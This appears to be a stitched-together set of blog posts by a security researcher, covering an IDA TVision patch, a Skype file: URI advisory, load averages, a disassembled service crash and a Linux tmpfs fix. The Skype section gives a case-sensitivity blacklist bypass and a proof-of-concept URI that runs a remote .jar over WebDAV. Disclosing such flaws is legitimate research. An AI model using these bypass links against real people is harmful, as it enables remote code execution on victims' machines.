I talked to Ilfak to add the patch to the TVision source code, however he told me that now there is a similar patch already implemented in TVision (since Jan 2009). I’ll try it to verify if it works like mine.

This service can analyze binaries with several AV engines (like other well-knonwn online services), nevertheless it adds a new functionality: Remote File Analyzer (URL Analyzer). You don’t have  to download the binary, we download it for you.

I would like to add more IDS and antivirus engines, so if you’re interested in add your AV or IDS engine, please send me an email: engines@allthreats.com

Basically Skype has some security restrictions when a file: URL is sent to a chat conversation. This URL is linkable and if skype detect some dangerous extensions, it shows a warning (if clicked). However the comparison isn’t ignore case, and is very easy to bypass using at least one upper case character: file:cmd.Exe (for example) or without any extension: file:cmd.

Even worst if we add a netbios computer name file:\\computername\sample.EXE it’ll be executed without any warning!!!!

And even better if we use an IP address and a jar file.
Skype doesn’t check “file:” link to verify if it’s an url with a jar extension (java executable). Once the user click on the link, the jar file will be executed in the system, without any Skype or Windows warning. This vulnerability could be used to remote code execution if the attacker send a link pointing to file in a webdav server.

Windows will use two methods to retrive the files:

a ) As a shared folder - The link will be treated as a shared folder, trying to connect with netbios
b ) Webdav Client - Windows Explorer is able to browse a WebDAV server as a network place. If the first method fails,
the integrated webdav client will be used allowing to download and execute the file from a remote webdav server.

EJ: file:\\webdavserver\dav\file.jar
POC: file:\\www.inkatel.com\MyDav\myjar.jar

Read the entire advisory for more information: Skype Security Bypass and Remote Code execution vulnerabilities

If want to read more abou it, you can download the entire paper: “Graph, Entropy and Grid Computing: Automatic Comparison of Malware” ( Copyright is held by Virus Bulletin Ltd.; made available on this site for personal use free of charge by permission of Virus Bulletin. This work may not be reproduced or redistributed without express permission from the copyright holder.)

It was he first time I’ve talked in a big conference and I was nervous, of course. However It has been a great experience.

To exploit it, an attacker needs to construct and send to the victim (as a skype chat message) a malicious file: URI. There are two flaws with this advisory. Once of them is related to a case sensitive comparison. Skype has a blacklist of potential dangerous file extensions (.ade, .adp, .asd, .bas, .bat, .cab, .chm, .cmd, .com, .cpl, .crt, .dll, .eml, .exe, .hlp, .hta, .inf, .ins, .isp, .js, …) and when a file: URI is sent to a user and the victim clicks on it, this URI is checked to verify if one of the blacklisted extension is used, however this comparison isn’t ignore case.

The other flaw is more dangerous and allows remote code execution. The blacklist of dangerous file extension fails to mention some executable file formats, so it’s easy to execute arbitrary code in the remote computer sending a file: URI which point to a remote executable with this file format.

You can read the Idefense Advisory and the Skype Advisory

Tvision patch for IDALinux (Version 0.2) for TVision IDA port (20/11/2007)

• during the last minute the CPU was overloaded by 358% so 2.58 process were waiting for CPU time
• however in the last 15 minutes the system was busy half of the time

How can we use this data? It means that the system could have process all the task if it were 3.58 time faster or if the system had 4 CPU’s
As we said, these values really depend on number of CPU’s. In a system with one CPU, the point of perfect utilization, meaning that the CPUs are always busy and, yet, no process ever waits, is 1.00 (100%).

In a system with more than one CPU is the average matching the number of CPU’s. For example, if we have a computer with 4 CPU’s and the load average for the last minute is 4.00, this means the computer has been using the CPU’s perfectly for the last minute (there weren’t any process waiting for CPU time).

I had developed a PoC for W2K SP4 however a PoC for WinXP is hard to develop because i couldn’t find a call esp, or similar instruction, with an unicode address format.

This is the technical analysis of the vulnerability:

ADVANCED DESCRIPTION

According to MSDN you cannot use any file functions (CreateFile, GetFileAttributes, etc)
with a path which is longer than MAX_PATH, unless you prefix it with \\?\.
Paths longer than 256 characters will cause Spyware Service (PcScnSrv) to crash.
Code execution is not possible.

The affected component is vstlib32.dll. A call to wcscpy_s is made, but there isn’t an exception
handler defined when invalid parameter is found, so the service calls Dr. Watson:

.ext:67105510 sub_67105510 proc near ; CODE XREF: sub_67105790+A8p
.text:67105510 ; sub_67105790+11Cp
.text:67105510
.text:67105510 var_628 = word ptr -628h
.text:67105510 szLongPath = word ptr -61Ch
.text:67105510 var_414 = word ptr -414h
.text:67105510 var_20E = word ptr -20Eh
.text:67105510 szShortPath = word ptr -20Ch
.text:67105510 var_4 = dword ptr -4
.text:67105510 arg_0 = dword ptr 4
.ext:67105510 sub esp, 620h
.text:67105516 mov eax, dword_6711C138
.text:6710551B xor eax, esp
.text:6710551D mov [esp+620h+var_4], eax
.text:67105524 push esi
.text:67105525 mov esi, [esp+624h+arg_0]
.text:6710552C push edi
.text:6710552D push esi
.text:6710552E mov edi, ecx
.text:67105530 call sub_67104110
.text:67105535 test eax, eax
.text:67105537 push esi ; strDestination
.text:67105538 jz loc_67105673

[…]

.ext:67105673 loc_67105673: ; CODE XREF: sub_67105510+28j
.text:67105673 lea eax, [esp+62Ch+var_414]
.text:6710567A push 104h ; MAX_PATH
.text:6710567F push eax ; strSource
.text:67105680 call _wcscpy_s ; invalid parameter error inside wcscpy_s invoke
; Dr. Watson. There isn’t an exception handler
; defined (with set_invalid_parameter_handler) so
; the process crash

According to MSDN:
“If strDestination or strSource is a null pointer, or if the destination string is too small, the invalid parameter handler
is invoked as described in Parameter Validation.”

Invalid Parameter Handler Routine
“The behavior of the C Runtime when an invalid parameter is found is to call the currently assigned invalid parameter handler.
The default invalid parameter invokes Watson crash reporting, which causes the application to crash and asks the user if they
want to load the crash dump to Microsoft for analysis. In Debug mode, an invalid parameter also results in a failed assertion.
This behavior can be changed by using the function _set_invalid_parameter_handler to set the invalid parameter handler to your
own function”

An exception handler for invalid parameter would have to be set with set_invalid_parameter_handler, so the program wouldn’t have
to invoke Dr. Watson.

Bus error - the /dev/shm or /tmp mount likely just ran out of space
Kernel panic - not syncing: Kernel mode signal 7

After some research and googling i could solve the problem. The host system had mounted /dev/shm as tmpfs, with an approx. size of 200M. /dev/shm is an implementation of traditional shared memory concept. This filesystem is used by UML nevertheless sometimes it can get out of space (if it hasn’t got enough size).
The problem can be solved adding or modifying a line inside /etc/fstab of host system (not guest):

tmpfs /dev/shm tmpfs defaults,size=1000M 0 0

This size works for me, try other values (RAM size for example)